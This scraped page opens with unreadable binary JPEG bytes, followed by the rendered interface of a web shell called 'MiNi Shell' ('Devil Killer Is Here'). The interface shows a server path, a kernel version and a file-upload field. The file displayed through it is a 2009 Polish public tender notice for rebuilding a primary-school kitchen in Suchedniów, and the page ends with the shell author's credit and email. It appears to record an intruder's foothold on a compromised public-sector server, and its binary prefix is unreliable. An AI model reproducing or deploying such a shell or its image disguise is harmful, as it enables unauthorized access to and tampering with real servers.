JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/87873-N-2009.html

<p class="kh_header"><b>Suchedniów: PRZEBUBOWA POMIESZCZEŃ KUCHENNYCH SZKOŁY PODSTAWOWEJ W OSTOJOWIE  GMINA SUCHEDNIÓW</b><br>
<b>Numer ogłoszenia: 87873 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowy Zespół Obsługi Oświaty w Suchedniowie , ul. Fabryczna 5, 26-130 Suchedniów, woj. świętokrzyskie, tel. 041 2543392, faks 041 2543392.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suchedniow.bip.doc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUBOWA POMIESZCZEŃ KUCHENNYCH SZKOŁY PODSTAWOWEJ W OSTOJOWIE  GMINA SUCHEDNIÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I	LOKALIZACJA INWESTYCJI :  Szkoła Podstawowa w Ostojowie
	                                                         26-130 Suchedniów
					           Ostojów 16
	 					pow. skarżyski
woj.  świętokrzyskie
			 

II	OPIS PRZEDMIOTU ZAMÓWIENIA ( ZAKRES):
	
                          
Stan istniejący:
Obiekt położony jest w Ostojowie w Samorządowej Szkole Podstawowej i jest obiektem istniejącym. Podlega przebudowie w zakresie dostosowania kuchni do obowiązujących przepisów sanitarnych. W kuchni przygotowywane będą obiady dla około  50 dzieci, które będą konsumowały go na miejscu w stołówce. Obiekt jest konstrukcji tradycyjnej murowanej.

Zakres rzeczowy: 
Powierzchnia adaptowanych pomieszczeń: 99,13 m2
w tym:
1. komunikacja                                    3,50 m2
2. pom.socjalne                                   4,70 m2
3. pom. porządkowe                            2,62 m2
4. komunikacja                                    5,59 m2
5. wyparzalnia jaj                                1,57 m2
6. magazyn mięsa                               5,15 m2
7. magazyn warzyw - obieralnia         5,18 m2
8. kuchnia - przygotowalnia              24,57 m2
9. zmywalnia                                       4,40 m2
10. jadalnia                                        41,85 m2
Ściany murowane wykończone tynkiem mineralnym na siatce na styropianie. Ścianki działowe projektowane lekkie szkieletowe obite płytkami gisowo-kartonowymi wodoodpornymi, wypełnione wełną mineralną. 
Od wewnątrz ściany murowane wykończone tynkiem gładkim wapienno-cementowym i malowane farbą mineralną akrylową w kolorze białym. W pomieszczeniach takich jak: przygotowalnia, zmywalnia, wyparzalnia jaj, magazyn mięs z przygotowaniem wstępnym, kredens podawczy ściany wyłożyć glazurą do wysokości min. 2,0 m od podłogi. 
Przy umywalkach i zlewozmywakach w pozostałych pomieszczeniach ściany również wyłożyć glazurą do wysokości 1,6 m od podłogi, 60 cm poza obrys urządzenia. 
Sufity wykończone tynkiem gładkim wapienno-cementowym, malowane farbą akrylową w kolorze białym.
Posadzki we wszystkich pomieszczeniach łatwo zmywalne z terrakoty.
Wentylacja grawitacyjna. W przygotowalni, zmywalni wentylacja mechaniczna nawiewno-wywiewna, nad taboretem elektrycznym i gazowym zamontować okap z wyciągiem mechanicznym, w kratce wentylacyjnej w zmywalni zamontować wentylator wywiewny EDM 100. Zamontować w oknach nawiewniki higrosterowane. 
Obiekt wyposażony jest w instalację elektryczną, wodno-kanalizacyjną, ogrzewanie pomieszczeń, wody - co. Odprowadzenie ścieków z kuchni do kanalizacji sanitarnej poprzez separator tłuszczów. 
Odpadki wywożone codziennie po zakończeniu pracy.

Dane wielkościowe:
      -roboty malarskie ( akryl- ściany i sufity, lamperie- olejno )- 332,31 m2
-roboty posadzkarskie -  57,28  m2
-licowanie ścian płytkami -102,88  m2
-roboty elektryczne - 119,6  mb. YDYp  
-oświetlenie (oprawy żarowe szt. 3,  oprawy świetlówkowe 2x40W szt. 10  )
-ścianki z gips kartonu - 32,28 m2
-instalacja wod.kan. gaz i wentylacja - 1kpl.
-drzwi wew. dr.- 16,2 m2
-okna podawcze PCV- szt. 2

Przeznaczenie:
Pomieszczenia wykorzystywane będą na kuchnię z pomieszczeniami pomocniczymi, pomieszczenia socjalne dla pracowników oraz jadalnię.
W kuchni przygotowywane będą obiady jednodaniowe lub dwudaniowe do skonsumowania na miejscu przez dzieci uczęszczające do szkoły.
Warzywa okopowe przechowywane będą oraz obierane i myte w magazynie do tego przystosowanym zlokalizowanym w części magazynowej, jaja będą przechowywane, myte i wyparzane w wyparzalni jaj. Produkty typu mięso, ryby, drób, nabiał przechowywane będą w chłodziarkach ustawionych w magazynie mięs, każdy z tych produktów odrębnie. Produkty pozostałe typu sypkiego jak mąka, kasze, ryż, przyprawy itd. przechowywane będą w szufladach ustawionych w przygotowalni. W/w produkty dostarczane będą w ilości, która pomieści się w ustawionych regałach, szafkach, lodówkach.
Pieczywo dostarczane jest w ilości dziennego zapotrzebowania.
Obiady po przygotowaniu podawane będą dzieciom poprzez okno podawcze na salę jadalną.
Po zjedzeniu obiadu brudne naczynia dostarczane będą do zmywalni poprzez okno podawcze, gdzie będą myte, wyparzane i odkładane do kredensu podawczego.

Wykonać operat powykonawczy w 2 jednobrzmiących  egzemplarzach  zawierający:  -  dziennik budowy, atesty, świadectwa kontroli, aprobaty techniczne , gwarancje,  itp. na wbudowane materiały,   list gwarancyjny, odbiory częściowe robót zanikających.

UWAGA:
POZOSTAŁE ROBOTY ORAZ MATERIAŁY ZGODNIE Z WARUNKAMI TECHNICZNYMI , OPISEM, PRZEDMIAREM ROBÓT , OBMIARAMI WŁASNYMI, SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT ZAŁĄCZONYMI DO SPECYFIKACJI ISTOTNYCH WARUNKÓW ZAMÓWIENIA.
Wykonawca winien sprawdzić w terenie warunki wykonania zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.20.00-6, 45.26.25.00-6, 45.42.11.00-5, 45.41.00.00-4, 45.43.22.10-9, 45.43.21.00-5, 45.44.21.00-8, 45.33.00.00-9, 45.33.12.00-8, 45.31.12.00-2, 45.31.11.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium -  1.500,00 zł. (słownie : jeden tysiąc pięćset zł.).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 1)	spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn 
.Art. 22. 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią
pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego
i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. udzielą minimum 3 lat gwarancji na wykonane roboty budowlane,
3. wykażą się odpowiednim doświadczeniem, tj. w okresie 5 ostatnich lat- a jeżeli okres   prowadzenia działalności jest krótszy - w tym okresie - przed dniem wszczęcia    postępowania wykonali minimum jedną  robotę budowlaną   w zakresie remontów obiektów budowlanych użyteczności publicznej  wraz  i wartości odpowiadającej przedmiotowi postępowania, (uwaga: roboty w tym okresie można sumować),
4. wykażą się, że dysponują osobami lub będą dysponować, które są zdolne do kierowania                                i wykonania zamówienia, tj. w   zakresie  budowlanej, instalacji wodociągowej , sanitarnej, gazowej , elektrycznej.
5.ich oferta będzie zgodna z warunkami SIWZ.
W przypadku,  gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga się,  aby żaden z jego członków nie podlegał wykluczeniu z postępowania na podstawie art. 24  ust. 1 i 2 ustawy.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w   postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów. Wykonawcy  nie spełniający warunków zostaną wykluczeni z postępowania,  (metoda spełnia - nie spełnia).
Przy wyborze oferty Zamawiający będzie się kierował następującym kryterium
Cena 100%.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w niniejszym postępowaniu określonych w rozdziale V  niniejszej specyfikacji Wykonawcy muszą przedstawić następujące dokumenty: 
1)formularz ofertowy

2)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności    gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

3)aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

4)wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania   o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;

5)wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował wykonawca; ( pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował),

    6) wykazu osób i podmiotów którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; (uprawnienia budowlane- injstalacje sanitarne, elektryczne, gazowe,  aktualne zaświadczenia o przynależności  do izby inżynierów budownictwa ); ( pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował),

    7)oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art.22 ust1 ustawy
       oraz     nie       podlegający wykluczeniu z postępowania o udzielenie zamówienia  na podstawie 
       art.24 ust 1 i 2.

8)harmonogram rzeczowo finansowy - należy wypełnić druk załączony do SIWZ zgodnie z przedstawioną ofertą  i kosztorysami,

     9)kosztorys ofertowy szczegółowy sporządzony na podstawie przedmiarów, zestawień,  projektów
        budowlanych, wizji    lokalnej, SIWZ i  obowiązujących przepisów.

    10)dokument potwierdzający wpłatę wadium,

   11)oświadczenia :
a/Oświadczenie o zapoznaniu się z terenem i obiektami stanowiącymi przedmiot zamówienia.
b/Oświadczenie o przyjęciu warunków umowy załączonej do niniejszej specyfikacji
c/Oświadczenie o związaniu złożoną ofertą przez okres 30 dni licząc od daty upływu składania ofert.
d/Oświadczenie, że wyliczona wartość brutto zadania jest kompletna i że jej wyliczenie nastąpiło w oparciu o, Specyfikację Istotnych Warunków Zamówienia, wizję lokalną i posiadaną przez oferenta wiedzę techniczną
       e/Informacja czy oferent będzie wykonywał przedmiot w całości osobiście, czy też  za    pomocą
            podwykonawców.    
       f/oświadczenie o wniesieniu zabezpieczenia należytego wykonania zamówienia w wysokości 3%
          wartości     brutto oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.suchedniow.bip.doc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SAMORZĄDOWY ZESPÓŁ OBSŁUGI OŚWIATY
26-130 Suchedniów, ul. Fabryczna 5   - pokój 202.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2009 godzina 09:30, miejsce: SAMORZĄDOWY ZESPÓŁ OBSŁUGI OŚWIATY
26-130 Suchedniów, ul. Fabryczna 5   - pokój 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com